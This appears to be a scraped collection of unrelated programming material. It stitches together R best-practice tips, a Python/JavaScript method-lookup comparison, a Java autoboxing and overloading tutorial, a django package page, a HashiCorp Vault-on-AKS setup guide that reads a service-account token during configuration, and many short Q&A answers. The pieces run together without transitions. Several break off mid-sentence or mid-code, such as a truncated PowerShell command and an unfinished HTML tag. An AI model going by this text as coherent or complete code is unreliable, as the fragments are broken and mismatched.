flog.info(paste0('Fitting ', MODELLING_METHOD))
if (MODELLING_METHOD == MODELLING_METHOD_RF) {
  set.seed(42)
  my_model <- caret::train(form=modelling_formula, data=df, method='rf')
} else if (MODELLING_METHOD == MODELLING_METHOD_GBM) {
  set.seed(42)
  my_model <- caret::train(form=modelling_formula, data=df, method='gbm', verbose=FALSE)
}
my_model
Functions are key ingredients of programming. Always put the repetitive tasks in your code into functions. These functions should always aim to perform one task and be general enough to be used for similar cases. How general typically depends on what you want to achieve.
Even helper functions should be well documented. The absolute minimum is to summarize what the function should do and what is the meaning of input parameters. I usually use roxygen comments so that the function can be later used in an R package without much extra work. For more details please see here.
#' Calculates Root Mean Squared Error
#'
#' @param observed vector with observed values
#' @param predicted vector with predicted values
#' @return numeric
f_calculate_rmse <- function(observed, predicted){
  error <- observed - predicted
  return(round(sqrt(mean(error^2)), 2))
}
You have to test the functions you are writing anyway, so it is a good idea to automate this step in case you would like to update the functions in the future. This is especially important if you plan to wrap your functions in a package. A nice way to do this is the testthat package. Here is a nice page on how to run your tests automatically.
library(testthat)
library(Metrics)

#' testing of f_calculate_rmse
test_that('Root Mean Square Error', {
  #' create some data
  n <- 100
  observed <- rnorm(n)
  predicted <- rnorm(n)
  my_rmse <- f_calculate_rmse(observed=observed, predicted=predicted)

  #' same results as Metrics::rmse
  expect_equal(my_rmse, Metrics::rmse(actual=observed, predicted=predicted), tolerance=.05)

  #' output is numeric and non-negative
  expect_that(my_rmse, is_a("numeric"))
  expect_that(my_rmse >= 0, is_true())
})
Obviously one does not need to write all the functions needed. A great advantage of R is that there are so many functions available in thousands of libraries. To make sure you will not run into namespace problems when two loaded libraries both contain a function with the same name, specify the package you want to use with packagename::functionname(). An example is the summarise function when both the plyr and dplyr packages are loaded.
library(plyr)
library(dplyr)

#' load data
data(mtcars)

#' see what happens
summarise(group_by(mtcars, cyl), n=n())
plyr::summarise(group_by(mtcars, cyl), n=n())
dplyr::summarise(group_by(mtcars, cyl), n=n())
2. Style
You will be reading your code again in the future so be nice to yourself (and anyone else who will have to read it) and have a consistent coding style. A lot of people use Google’s R style or Hadley Wickham’s style.
Here I also need to stress that it is important to comment your code. Especially when you consider your solution brilliant and obvious. Also please do not be afraid of long but self-explanatory function and variable names.
3. Version control
Always use version control for your projects. It will save you a lot of nerves. It has so many advantages. Here is a nice summary of them. The most important to me are
- ability to revert back to previous versions of my code
- clean project folder because I can delete anything without fear
- easy to invite colleagues to collaborate on the project
Using git is easy. Especially from RStudio.
4. Development
Development doesn’t necessarily need to be a messy process.
Your code is not working? Then you need to be able to quickly locate the problem and fix it. Luckily, RStudio has a lot of built-in debugging tools so that you can stop the code at the point where you suspect the problem is arising, and look at and/or walk through the code, step-by-step at that point.
#' create some data
set.seed(42)
n <- 100
observed <- rnorm(n)
predicted <- rnorm(n)

#' debug the function
debug(f_calculate_rmse)
f_calculate_rmse(observed=observed, predicted=predicted)
Each programming language has its own strengths and weaknesses that you need to keep in mind. You don't want your code to run too slow or use too much memory. A handy tool for this is profiling, and again RStudio comes with a solution. Profiling enables you to detect where the execution of your code takes the longest and where it uses the most memory. Do not rely on your intuition when optimizing your code! You should also check how the running time and memory requirements increase with the size of the data. This will give you an idea of what data your code can be used on and what the consequences for scaling could be.
library(profvis)

#' profiling of f_calculate_rmse
profvis({
  set.seed(42)
  n <- 1e5
  observed <- rnorm(n)
  predicted <- rnorm(n)
  f_calculate_rmse(observed=observed, predicted=predicted)
})
During the development you will encounter many problems. Each time this happens you should improve the error handling in your code and raise a self-explanatory warning or error. Especially mind the data types and missing parameters.
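As an illustration (my own sketch, not from the original post), defensive checks around the earlier RMSE helper might look like this; the function names are just examples, and the flog.error call assumes futile.logger is loaded:

#' Hedged sketch: defensive input checks plus tryCatch
f_calculate_rmse_safe <- function(observed, predicted){
  if (missing(observed) || missing(predicted)) stop('observed and predicted are required')
  if (!is.numeric(observed) || !is.numeric(predicted)) stop('inputs must be numeric')
  if (length(observed) != length(predicted)) stop('inputs must have the same length')
  f_calculate_rmse(observed=observed, predicted=predicted)
}

result <- tryCatch(
  f_calculate_rmse_safe(c(1, 2), 'oops'),
  error = function(e){ flog.error(e$message); NA }
)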
5. Deployment
Deployment means that your code will need to run automatically, or at least without you executing it line by line. In this case it is very helpful to know what is going on and whether the execution went well. For this purpose I use the futile.logger package. It is a lightweight solution that lets me log the execution of my code both to screen and to file. I just need to write understandable messages in the correct places in my code.
library(futile.logger)

#' logging setup
flog.threshold(DEBUG)                    # level of logging
flog.appender(appender.file('foo.log'))  # log to file

#' logging
flog.info('Some info message')
flog.debug('Some debug message')
flog.warn('Some warning message')
flog.error('Some error message')
Automated code execution is typically done by the cron scheduler using Rscript foo.r, which runs the foo.r script. Very often you want to specify some parameters of the script so that you can analyse different data, choose which machine learning method to use, decide whether to retrain the model, and so on. For this I use the argparse package. The following code enables me to specify the csv with input data on the command line: Rscript my_code.r -if latest_data.csv.
library(argparse)

#' default parameters
INPUT_FILE_DEFAULT <- 'input.csv'

#' create parser object
parser <- ArgumentParser(description='My code')

#' define arguments
parser$add_argument('-if', '--input_file', default=INPUT_FILE_DEFAULT,
                    type='character', help='Location of csv file with input data')

#' get command line options
args <- parser$parse_args()

#' load data
data <- read.csv(args$input_file)
6. Plotting
Data visualization is the “shop window” of analytics. Therefore you will probably spend a lot of time fine-tuning each plot. Good best practice is the following.
- define style, color palette and any other parameters in a separate script
- write a function to create a plot object
- use another function to either show the plot or save it to a file
Let’s see how it works in the following basic example.
library(ggplot2)
data(iris)

#' some basic style
my_colors <- list('red'='#B22222')

#' function to create histogram
f_create_histogram <- function(df, column){
  p <- ggplot(df, aes_string(x=column)) +
    geom_histogram(binwidth=.1, fill=my_colors$red) +
    ggtitle(paste0('Histogram of ', column))
  return(p)
}

#' create plots
sepal_length_hist <- f_create_histogram(iris, 'Sepal.Length')
sepal_width_hist <- f_create_histogram(iris, 'Sepal.Width')

#' show
sepal_length_hist

#' save
ggsave('sepal_width_hist.png', plot=sepal_width_hist)
7. Reproducibility
Make sure your code is reproducible. Because a lot of data science steps involve random sampling or optimization, we need to make sure that we can repeat the code with the same results. That is why it is critical to use the set.seed() function.
> set.seed(42); sample(LETTERS, 5)
[1] "X" "Z" "G" "T" "O"
> set.seed(42); sample(LETTERS, 5)
[1] "X" "Z" "G" "T" "O"
> sample(LETTERS, 5)
[1] "N" "S" "D" "P" "W"
8. Combine tools
Once you become confident in R programming you tend to do everything in R. Please do not forget that there are many other tools available and thanks to connectors they can be used together with R. For example I very often combine R with Python or SQL databases.
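For instance, talking to a SQL database from R is a few lines with DBI; this is a minimal sketch of mine using an in-memory SQLite database (it assumes the DBI and RSQLite packages are installed):

library(DBI)

con <- dbConnect(RSQLite::SQLite(), ":memory:")
dbWriteTable(con, "mtcars", mtcars)
dbGetQuery(con, "SELECT cyl, COUNT(*) AS n FROM mtcars GROUP BY cyl")
dbDisconnect(con)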
Hello, can you also recommend an R tutorial for beginners? Thank you!
Hey!
There are so many tutorials around that it's hard to pick one. I personally find a few books very useful.
Python's structures (classes, functions, and class instances) and JavaScript's structures (Object and function) are implemented in somewhat similar, yet somewhat different, ways.

In Python, a class's data and functions are both stored in its __dict__; an object's properties and methods live there together.

A JavaScript object (Object or function) has two hashes that store data: one is the prototype, the other (whose internal name I do not know yet) stores the object's own methods and data. Data and methods are likewise stored mixed together.

Method lookup on an instance works almost the same way in the two languages.
In Python:
class Dog():
    def spark(self):
        print "spark"

dog = Dog()
dog.spark()   # output: spark
Here dog.__dict__ contains nothing; when dog.spark is called, Python first looks for spark in dog.__dict__ and, if it is not there, searches the __dict__ of the class Dog. The class dict does not copy the function into the instance.
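A quick way to see this for yourself (a sketch I have added, not in the original):

print dog.__dict__            # {} -- the instance holds no methods
print Dog.__dict__['spark']   # the function object lives on the class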
In JavaScript:

function Dog() {}
Dog.prototype.spark = function () { alert('spark'); };

dog = new Dog();
dog.spark();   // output: spark
If we modify the method on the class Dog, will dog be affected?
Dog.prototype.spark = function () { alert('spark2'); };
dog.spark();   // output: spark2

It changed.
So JavaScript's method lookup is much like Python's.

Python and JavaScript feel alike. From Python's class and function definitions (key: value pairs) you can see that the dict is at Python's core; in JavaScript, the prototype is a dict. Both store methods and data mixed together: without "()" you get the method itself, and adding "()" calls it.
Ruby's implementation is not the same. Since Ruby is purely object-oriented and distinguishes internal member variables from methods, it stores them separately, in iv_table and m_table. Its class instantiation process, though, is also a bit like JavaScript's.

What JavaScript defines on the prototype is equivalent to Ruby's instance_methods: things that can be looked up from an instance. The difference is that JS copies the function reference, while a Ruby instance only keeps a class pointer (k_class) pointing to its class.

Both JS and Ruby split a class's functions into two parts: instance methods (the prototype) and class methods (an object's private methods).
Oops, I'm not going to kick you. This is the second part of my last post about wrapper classes. In this post I'm gonna talk about boxing.
Auto boxing
All these features were introduced in Java 5. In the previous post we saw how to convert primitives into wrapper objects. Since Java 5 we get automatic conversion of primitive data types into their equivalent wrapper objects.
Look at this code.
public class Autoboxing {
    public static void main(String[] args) {
        // Before Java 5
        Integer x1 = new Integer(100);  // Wrap
        int y1 = x1.intValue();         // Unwrap
        y1++;                           // Use
        x1 = new Integer(y1);           // Re-wrap

        // After Java 5
        Integer x2 = new Integer(100);  // Wrap
        x2++;                           // Unwrap -> Use -> Re-wrap

        System.out.println("Before Java 5: " + y1);
        System.out.println("After Java 5: " + x2);
    }
}

So now you can see that after Java 5 it is very easy to use wrapper objects in your programs.
==, != and equals()
In the previous post I used == to check equality of wrapper objects. Here is a simple program covering all three.
public class BoxingTest {
    public static void main(String args[]) {
        Integer i1 = 127;
        Integer i2 = 127;
        if (i1 != i2) {
            System.out.println("i1 != i2");
        }
        if (i1 == i2) {
            System.out.println("i1 == i2");
        }
        if (i1.equals(i2)) {
            System.out.println("i1.equals(i2)");
        }
    }
}
When you run this program you can see the output as follows.
i1 == i2
i1.equals(i2)
Then lets look at following program.
public class BoxingTest {
    public static void main(String args[]) {
        Integer i1 = 128;
        Integer i2 = 128;
        if (i1 != i2) {
            System.out.println("i1 != i2");
        }
        if (i1 == i2) {
            System.out.println("i1 == i2");
        }
        if (i1.equals(i2)) {
            System.out.println("i1.equals(i2)");
        }
    }
}

In this program I have changed one thing: 127 to 128. When you run it you can see the output as follows, and the result may confuse you. But don't be confused.
i1 != i2
i1.equals(i2)
You can see that i1.equals(i2) is common to both outputs; the equals method checks for meaningful equality. But when I changed 127 to 128, == gave the opposite result: i1 == i2 for 127, but i1 != i2 for 128.
Here is the answer to the question running in your mind. Java does this to save memory and avoid creating unnecessary objects. Java guarantees that the following wrapper objects will always be identical (==) when their primitive values are the same. Here is the list.
Boolean
Byte
Character ( \u0000 to \u007f )
Short ( -128 to 127 )
Integer ( -128 to 127 )
What will happen Primitive == Wrapper ?
First of all try this program and find the result.
You can see the output as "i1 == i2". In this program, the wrapper object that you used is automatically converted to primitive. Then it checks the comparison between primitive and primitive.
public class EqualTest {
    public static void main(String[] args) {
        Integer i1 = 100;
        int i2 = 100;
        if (i1 == i2) {
            System.out.println("i1 == i2");
        } else {
            System.out.println("i1 != i2");
        }
    }
}
You can see the output as "i1 == i2". In this program, the wrapper object that you used is automatically converted to primitive. Then it checks the comparison between primitive and primitive.
Important !
A wrapper reference variable can be null; try this example to see what happens.
public class BoxTest2 {
    Integer x;

    public static void main(String[] args) {
        BoxTest2 obj = new BoxTest2();
        display(obj.x);   // obj.x is null; unboxing it to int throws a NullPointerException
    }

    static void display(int i) {
        int y = 10;
        System.out.println(i + y);
    }
}
Boxing with Overloading
This is another use of overloading: you can combine boxing with overloading. In this case we consider three factors that affect overload resolution.
- Widening
- Auto-boxing
- Var-args
What do you mean by Widening ?
Widening is the conversion of a value to a larger data type; see the sketch after this list.
- byte to short / int / long / float / double
- short to int / long / float / double
- int to long / float / double
- long to float / double
- float to double
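A minimal sketch of implicit widening (my own example, not from the original post):

byte b = 10;
int i = b;       // byte -> int
long l = i;      // int -> long
double d = l;    // long -> double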
Widening vs Boxing
Here is a simple program, try it.
public class Boxing1 {
    public static void main(String args[]) {
        int i = 10;
        run(i);
    }

    static void run(Long x) {
        System.out.println("Long");
    }

    static void run(long x) {
        System.out.println("long");
    }
}
There you can see the output: it is "long". Why not "Long"? Because the JVM considers it cheaper to widen a primitive value than to perform a boxing operation. So widening beats boxing. Widening wins.
Old vs New ( Widening vs Var-args )
public class Boxing2 {
    public static void main(String args[]) {
        int i = 10;
        calc(i, i);
    }

    static void calc(int x, int y) {
        System.out.println("OLD");
    }

    static void calc(int... x) {
        System.out.println("NEW");
    }
}
Var-args is a feature introduced in Java 5 (see the earlier post about var-args). In a case like this the compiler chooses the older style first and only then the newer style. So widening also beats var-args.
Boxing vs Var-args
You saw widening vs boxing and widening vs var-args. Then you may wonder about the result of boxing vs var-args. Try this program and you will see that var-args is the loser.
public class Boxing3 {
    public static void main(String args[]) {
        int i = 100;
        run(i, i);
    }

    static void run(Integer x, Integer y) {
        System.out.println("boxing");
    }

    static void run(int... x) {
        System.out.println("var-args");
    }
}
Widening reference variables
I think you can remember about Inheritance and IS-A relationships( Click here to go to OOP post ). There is a simple example and you can see the relationship between inheritance and widening.
class Fruit {
    static void eat() {
        System.out.println("This is the eat method in Fruit class");
    }
}

public class Apple extends Fruit {
    public static void main(String[] args) {
        Apple obj = new Apple();
        obj.drink(obj);
        obj.eat();
    }

    static void drink(Fruit a) {
        System.out.println("This is the drink method in Apple class");
    }
}
You can see that the drink() method takes a Fruit parameter and is defined in the Apple child class. Apple IS-A Fruit, so the compiler widens the Apple reference to Fruit. This widening depends on inheritance: where there is an IS-A relationship, widening can be used. But you cannot widen one wrapper class to another. Look at the following example.
public class Boxing5 {
    public static void main(String args[]) {
        Boxing5 b = new Boxing5();
        b.go(new Integer(10));
    }

    void go(Double d) { }
}
In this example the compiler reports an error (Eclipse will flag it immediately), because an Integer reference cannot be widened to a Double.
Overloading with Widening and many Var-args
In previous examples you saw this thing with only one Var-arg. In this section it is about many var-args. Try this example to understand.
public class Boxing6 {
    public static void main(String args[]) {
        Boxing6 obj = new Boxing6();
        int x = 10;
        obj.wide(x, x);
        obj.box(x, x);
    }

    void wide(long... i) {
        System.out.println("long");
    }

    void box(Integer... I) {
        System.out.println("Integer");
    }
}
This will compile and run fine. You can change the data types and wrapper objects I have used in this example; then you can see the possibilities of using many var-args with widening. You need to understand that you can combine var-args with either widening or boxing.
django-template-fragments 0.1.3
helper for templates used in javascript client frameworks: allows you to store small django templates in a dir and generates a javascript object that contains them all as strings

# Introduction
Often,
From pip:
pip install django-template-fragments
From setup.py:
git clone git://github.com/Psycojoker/django-template-fragments.git
cd django-template-fragments
python setup.py install
Create a dir where you want to store your fragments, then add `FRAGMENTS_DIR` to your `settings.py`; it must be an absolute path. I like to define my `FRAGMENTS_DIR` like this:
import os
PROJECT`
url(r'^', include('fragments.urls')),
And somewhere in your base template
<script type="text/javascript" src="{% url fragments %}"/>
This will give you a javascript object `fragments` containing all your fragments, the key is the filename of the fragment without the extension.
Example: `object_list.html` will be accessible in the `fragments` object like this: `fragments.object_list`
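As an illustration (a hedged sketch of mine, not from the README; `myRender` is a hypothetical client-side template renderer):

var source = fragments.object_list;             // the raw template string
var html = myRender(source, {object_list: []}); // myRender stands in for your framework's render call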
If
If you have [HamlPy] installed and your fragment name ends with `.haml`, django-template-fragments will take it into account and use HamlPy to generate the html.
# Verbatim tag
**You
By default `django-template-fragments` ignores every files that ends with one of those: `.pyc` `.swo` `.swp` `~`
You can specify your own list by defining `FRAGMENTS_IGNORED_FILE_TYPES` in your `settings.py`.
- Author: Laurent Peuch
- License: MIT
- Package Index Owner: psycojoker
- DOAP record: django-template-fragments-0.1.3.xml
Installation and Configuration of HashiCorp Vault on AKS
This article focuses on deployment and configuration of HashiCorp Vault on AKS and use the secret values as ENV variables in pod.
Prerequisites: Helm, Kubernetes, YAML.
1: Install the Vault Helm chart
1.1: Add the HashiCorp Helm repository using following command.
helm repo add hashicorp https://helm.releases.hashicorp.com
1.2: Update all the helm repositories.
helm repo update
1.3: Pull the vault helm chart in your local machine using following command.
helm pull hashicorp/vault --untar
1.4: Now open the values.yaml file and do the changes according to your need.
I am going to enable the UI and set its service type to LoadBalancer so we can access the Vault web UI, as sketched below.
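Since the screenshot is not reproduced here, this is roughly what the relevant part of values.yaml looks like (a hedged sketch; the key names follow the chart's documented schema):

ui:
  enabled: true
  serviceType: "LoadBalancer"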
1.5: Create a namespace ‘vault’ and install the vault helm chart in that namespace using following commands.
kubectl create ns vault
helm install vault . -f values.yaml -n vault
1.6: Get all the pods within the vault namespace.
kubectl get pods -n vault
The vault-0 pod runs a Vault server and reports that it is Running but not ready (0/1). This is because the status check defined in a readinessProbe returns a non-zero exit code.
2: Initialize and unseal Vault
Vault starts uninitialized and in the sealed state. The process of initializing and unsealing Vault can be performed via the exposed Web UI.
2.1: Get the external IP of the vault-ui service, launch a web browser, and enter the EXTERNAL-IP with the port 8200 in the address bar, for example http://<EXTERNAL-IP>:8200.
2.2: Enter 5 in the Key shares and 3 in the Key threshold text fields.
2.3: Click Initialize.
2.4: When the root token and unseal key is presented, scroll down to the bottom and select Download keys. Save the generated unseal keys file to your computer.
2.5: Click Continue to Unseal to proceed and open the downloaded file.
2.6: Enter the unseal keys, one at a time, until the key threshold is met and Vault reports it is unsealed.
2.7: Copy the root_token and enter its value in the Token field. Click Sign In.
3: Set a secret in Vault
3.1: Select the Secrets tab in the Vault UI. Under Secrets Engines, select Enable new engine.
3.2: Under Enable a Secrets Engine, select KV and Next.
3.3: Enter secret in the Path text field and select Enable Engine.
3.4: Now create a secret as shown below as per your need.
Enter microservices/service-name in the Path for this secret.
Select Add to create another key and value field in Version data.
Select Save to create the secret.
4: Configure Kubernetes authentication
Vault provides a Kubernetes authentication method that enables clients to authenticate with a Kubernetes Service Account Token.
4.1: Select the Access tab in the Vault UI. Under Authentication Methods, select Enable new method.
4.2: Under Enable an Authentication Method, select Kubernetes and Next.
Select Enable Method to create this authentication method with the default method options configuration.
The view displays the configuration settings that enable the auth method to communicate with the Kubernetes cluster. The Kubernetes host, CA Certificate, and Token Reviewer JWT require configuration. These values are defined on the vault-0 pod.
4.3: Enter the address returned by the following command in the Kubernetes host field.

echo "https://$(kubectl exec vault-0 -n vault -- env | grep KUBERNETES_PORT_443_TCP_ADDR | cut -f2 -d'='):443"
4.4: For the Kubernetes CA Certificate field, toggle the Enter as text. Enter the certificate returned from the following command in Kubernetes CA Certificate entered as text.
kubectl exec vault-0 -n vault -- cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
4.5: Expand the Kubernetes Options section. Enter the token returned from the following command in Token Reviewer JWT field.
echo $(kubectl exec vault-0 -n vault -- cat /var/run/secrets/kubernetes.io/serviceaccount/token)
4.6: Select Save.
5: Configure Micro-service authentication
5.1: Select the Policies tab in the Vault UI. Under ACL Policies, select the Create ACL policy action.
5.2: Enter microservices in the Name field.
5.3: Enter this policy in the Policy field.
path "secret/data/microservices/*" {
  capabilities = ["read"]
}
5.4: Select Create policy.
The policy is assigned to the micro-service through a Kubernetes role. This role also defines the Kubernetes service account and Kubernetes namespace that is allowed to authenticate.
5.5: Under Authentication Methods, click the … for the kubernetes/ auth method. Select View configuration.
5.6: Under the kubernetes method, choose the Roles tab and Select Create role.
5.7: Enter microservices in Name field.
Enter vault in the Bound service account names field. Enter default in the Bound service account namespaces field and select Add.
5.8: Expand the Tokens section.
Enter microservices in the Generated Token's Policies field and select Save.
6: Deploy application
6.1: Define a Kubernetes service account named vault as shown below.

cat > sa.yaml <<EOF
apiVersion: v1
kind: ServiceAccount
metadata:
  name: vault
EOF
Create the vault service account using the following command.
kubectl apply -f sa.yaml
6.2: Add the annotations sketched below to your k8s deployment file as per your requirements. Using the vault.hashicorp.com/agent-inject-template-config annotation, you can expose secret values as ENV variables in the pod.
Note: In place of sleep 1000000 in args, use your own command to start the application.
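Since the highlighted screenshot is not reproduced here, the following is a hedged sketch of the kind of pod annotations the article refers to; the role, secret path, and template body must be adapted to your own setup:

spec:
  template:
    metadata:
      annotations:
        vault.hashicorp.com/agent-inject: "true"
        vault.hashicorp.com/role: "microservices"
        vault.hashicorp.com/agent-inject-secret-config: "secret/data/microservices/service-name"
        vault.hashicorp.com/agent-inject-template-config: |
          {{- with secret "secret/data/microservices/service-name" -}}
          {{- range $k, $v := .Data.data }}
          export {{ $k }}="{{ $v }}"
          {{- end }}
          {{- end }}
    spec:
      serviceAccountName: vault

The injector renders the template to /vault/secrets/config inside the pod, which your container can source before starting the application.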
6.3: Apply the above deployment file and you are done.
You can check the error code from commands you run
#!/bin/bash

function test {
    "$@"
    status=$?
    if [ $status -ne 0 ]; then
        echo "error with $1"
        exit 255
    fi
    return $status
}

test ls
test ps -ef
test not_a_command
taken from here; for more information see Bash Beginner Check Exit Status.

You can't stop the user from running the script, nor can you guarantee that
they will run your script. The browser, and any scripts that run there,
are outside of your control.
Any important security code needs to run on the server - that's where you
need to validate the fields. That's the piece of the system that you
control.
So, some tips for you:
1st. (according to comment)
Add as a first line to your sub: Application.ScreenUpdating = false and add
the other line right before End Sub : Application.ScreenUpdating = true
2nd. Move this line (it's setting constance reference):
Set wb = Workbooks("Equipment Further Documentation List.xls")
before:
Do Until txtStream.AtEndOfStream
3rd is just a tip.
To see the progress of your sub add the following line:
Application.StatusBar = file.Name
after this line:
Workbooks.Open strNextLine & Application.PathSeparator & file.Name
Before the End Sub add additionally this code:
Application.StatusBar = false
As a result you can see in Excel app, in the status bar, file name which is
currently in process.
Keep in mind that working with 500 files must take a while.
If you have never run the test suite for your current branch, Tddium will
simply pick up the test pattern and use it. If you have already configured
the suite for the current branch, the simplest solution is to run tddium
suite --edit.
We had the same issue on our website. It started happening yesterday,
04/07/2013, and only in the IE7 browser. We just excluded that browser
from showing the Like box with the code below:

if (navigator.appVersion.indexOf("MSIE 7.") == -1) {
    // code that renders the Like box goes here
}
You must finish your threads and release every resources when the bundle is
stopping. You can do it for example in the BundleActivator stop method.
In case you have new threads you should also be sure that the threads
finish their job before the stop function returns. This means that if your
jobs need to run for a long time before finish (e.g. due to an iteration)
they should be designed in a way that they can be interrupted.
You could use the cwd parameter to run scriptB in its own directory:

import os
from subprocess import check_call

check_call([scriptB], cwd=os.path.dirname(scriptB))
If you return false from the submit handler it will cancel the submit
event.
You can change your DateDiff.inDays call into:
if (!DateDiff.inDays(d2, d1)) {
return false;
}
I found the solution. There is an option "allow service to interact with
desktop" in the "Log On" tab of the service properties. After checking it
and restarting, Tera Term works fine: the Tera Term window does not appear.
Solved!
What about usig nohup?
nohup is a POSIX command to ignore the HUP (hangup) signal. The HUP
(hangup) signal is by convention the way a terminal warns dependent
processes of logout.
As Omar suggested, I want to give an id instead of $(document). Using
pagebeforeshow or pageshow, pagehide, and clearing the interval will solve
this issue. The following code works for me:
var auto_refresh;
$("#light-page").on('pagebeforeshow', function(){
auto_refresh = setInterval(function () {
// code
}, 3000);
});
$('#light-page').on('pagehide', function () {
clearInterval(auto_refresh);
});
Adding id in Html:
<div data-
</div>?
The use of function statements in JavaScript is discouraged. Check out
Mozilla's page on function scope which has a great section on function
statements vs. function expressions, and states:
Functions can be conditionally defined using either function
statements (an allowed extension to the ECMA-262 Edition 3 standard) or
the Function constructor. Please note that such function statements are no
longer allowed in ES5 strict. Additionally, this feature does not work
consistently cross-browser, so you should not rely on it.
The fact that you are seeing differences between browsers with this code is
not surprising.
Try
var tile1 = function () {
...
}
While this should work for you here, it does so only because variable
definitions with var are hoisted. As JavaScript evol
You can use $.off to unbind an event, but I would recommend to just use a
variable to keep track if its been triggered or not.
This snippet will prevent f from being called until the scrolling has been
set to false again.
$(window).scroll(function(){
if(this.scrolling == undefined)
this.scrolling = false;
if(this.scrolling == false){
this.scrolling = true;
f();
}
});
function f(){
//execute code
window.scrolling = false;
}
This is most likely caused by too-strong quoting. This error line
bash: /bin/echo 'hello'; bash -l: No such file or directory
shows that bash does not try to execute the command /bin/echo with the
argument 'hello' followed by the command bash -l. Instead bash is trying to
execute a single command literally named /bin/echo 'hello'; bash -l.
Compare:
$ ssh localhost -t "/bin/echo 'foo'; bash -l"
foo
$ logout # this is the new shell
Connection to localhost closed.
and:
$ ssh localhost -t '"/bin/echo 'foo'; bash -l"'
bash: /bin/echo foo; bash -l: No such file or directory
Connection to localhost closed.
The solution to this problem usually involves eval, but I cannot tell for
sure unless I see more code from you.
The first argument of setInterval needs to be a function.

window.setInterval(function () {
    $.get(url, function (data) {
        if (data.GhStatus == 0) {
            $('#GhCsStatus_CS').buttonMarkup({ icon: 'myapp-cs' });
            alert('crash');
        } else {
            $('#GhCsStatus_GH').buttonMarkup({ icon: 'myapp-gh' });
            alert('running');
        }
        if (data.CsStatus == 0) {
            $('#GhCsStatus_CS').buttonMarkup({ icon: 'myapp-cs' });
            alert('crash');
        } else {
            $('#GhCsStatus_GH').buttonMarkup({ icon: 'myapp-gh' });
            alert('running');
        }
    }, "json");
}, 5000); // the interval value was cut off in the original; 5000 ms is a placeholder
I think the problem you are actually facing is not that progress is run
once when the for loop finishes, but that the div where you are trying to
reflect that change is updated only when the windowsFillProcessTable
finishes executing. Since JavaScript is single threaded (for now) the
execution of windowsFillProcessTable blocks every other processing,
including DOM update.
You'll have to find an alternative scheme to make the update to your
progress bar. See this or this for possible options.
In the line of code
canv.tag_bind(obj,'<Double-1>',Yellow())
The expression Yellow() calls the function called Yellow. In order to
simply refer to a function (say to bind it to an event) instead of calling
it, you should just write Yellow. So your code should instead read
canv.tag_bind(obj,'<Double-1>',Yellow)
First of all, I don't see the advantage of declaring the label variable
with global scope in the context of the code you've shared. Since you're
returning a label from the getLabel function then I think you should just
declare var label; at the top of the getLabel function and return the
value of that local variable from the function.
Second, the only way I can see that "undefined" would be returned from
getLabel is if f.attributes.label is undefined. I would try a code block
such as:
} else { // is not cluster
    if (f.attributes.label != null && typeof f.attributes.label != "undefined") {
    // if (f.attributes.label) { // alternate simpler if statement
        label = " " + f.attributes.label;
    } else {
        label = " ";
    }
}
As suggested in my comment, you can add a class to the element (e.g. dragging)
when you start dragging in the start function of the draggable, then check
in the click handler whether the element (or its parent, in your case) has
the class, or alternatively fire the function.
Code:
$(document).ready(function () {
$('.container').draggable({
start: function (event, ui) {
$(this).addClass('dragging');
}
});
$('.clickable').click(function (event) {
if ($(this).parent().hasClass('dragging')) {
$(this).parent().removeClass('dragging');
} else {
//alert("real click");
$("#content").toggle();
}
});
});
Maybe there are alternatives to this, but it is the only solution that I used.
Demo:
There are two possible asynchronous executions which can get you these
results:
cheerio.load has not finished before createProduct is called.
In createProduct, product is not getting populated, or only partially
(e.g. description), before the callback is called (not sure).
You can use the async library to make the functions execute in order (using
async.series). If createProduct is asynchronous as well, you will have to
make it synchronous in a similar way.
async.series([
function(callback){
$ = cheerio.load(body);
callback();
},
function(callback){
createProduct(obj, function(product){
lookUp(product);
});
callback();
}
]);
Concurrent access to a shared resource is a well-known problem. Python
threads provide some mechanisms to avoid issues.
Use Python locks; locks are used to synchronize access to a shared resource:

from threading import Lock

lock = Lock()
lock.acquire()  # will block if lock is already held
# ... access shared resource
lock.release()
More information :
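A small sketch I would add: the context-manager form does the acquire and
release for you and releases the lock even if the critical section raises:

from threading import Lock

lock = Lock()
with lock:
    pass  # access the shared resource; the lock is released on exit, even on error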
The switch statement fires for each element of the array. This behavior is
documented (check Get-Help about_Switch):
If the test value is a collection, such as an array, each item in the
collection is evaluated in the order in which it appears.
Use a regular conditional instead (since you have only 2 cases anyway):
if ($attachArray -eq $null) {
Send-MailMessage -SmtpServer "internalrelay.corp.local" `
-From "test@andylab.local" -To $toAddresses `
-Subject "There should really be something more informative here" `
-BodyAsHTML $SCRIPT:htmlBody
} else {
Send-MailMessage -SmtpServer "internalrelay.corp.local" `
-From "test@andylab.local" -To $toAddresses `
-Subject "There should really be something more informative here" `
-BodyAsHTML $SCRIPT:htmlBody
-At
This method is not defined for the Object class in Rhino.
The Rhino documentation states:
Rhino contains
All the features of JavaScript 1.7
The Mozilla JavaScript documentation states Object.keys was:
Introduced in JavaScript 1.8.5
The same Object.keys documentation includes an example of how to add this
to previous version of JavaScript.
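For reference, a minimal fallback of my own (the MDN shim mentioned above is
more thorough) looks like this:

if (!Object.keys) {
    Object.keys = function (obj) {
        var keys = [];
        for (var k in obj) {
            if (Object.prototype.hasOwnProperty.call(obj, k)) {
                keys.push(k);
            }
        }
        return keys;
    };
}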
Waiting for asynchronous calls, as you're doing here, are designed to not
block any other code that you're running. So the each loop will loop
regardless of a response. So your solution is a different pattern.
First save your jQuery objects in an array
var user_checkboxes = [];
user_checkboxes = $('#users input:checkbox');
And then only submit the user at index 0 first.
function submitPost() {
    if (user_checkboxes.length === 0) return;
    var user = $(user_checkboxes[0]);   // wrap the DOM node so .is()/.val() work
    var a = user.is(':checked') ? user.val() : "";
    if (a != "") {
        postToPage(a); // a = PageId|AccessToken
    }
}
In your response from the Ajax call you can do this
FB.api('/' + d, { fields: 'access_token'}, function (b) {
if (dataSepra
I have checked the link; use the 'keyup' event. It works. With the keydown
or keypress events the handler runs before the value of the input tag is
updated, because the key is still down. If you hold the key for some time
you will see the function run immediately. On keyup the function runs after
the key is released and the value has been updated.
The method in main class call doesn't return correct result for bool
a1 and a2.
Maybe you checked your boolean variable on the line before calling the
CompareMyValue-Function?
I tested your code in a sample project and it worked fine for me:
bool a1 = _check.CompareMyValue(1, 1);
System.Diagnostics.Debug.Print(a1.ToString()); // prints true
bool a2 = _check2.CompareMyValue("xyz", "xyz");
System.Diagnostics.Debug.Print(a2.ToString()); // prints true
bool a3 = _check2.CompareMyValue("x", "y"); // another example
System.Diagnostics.Debug.Print(a3.ToString()); // prints false
$_COOKIE is created before your code is processed just like $_POST and
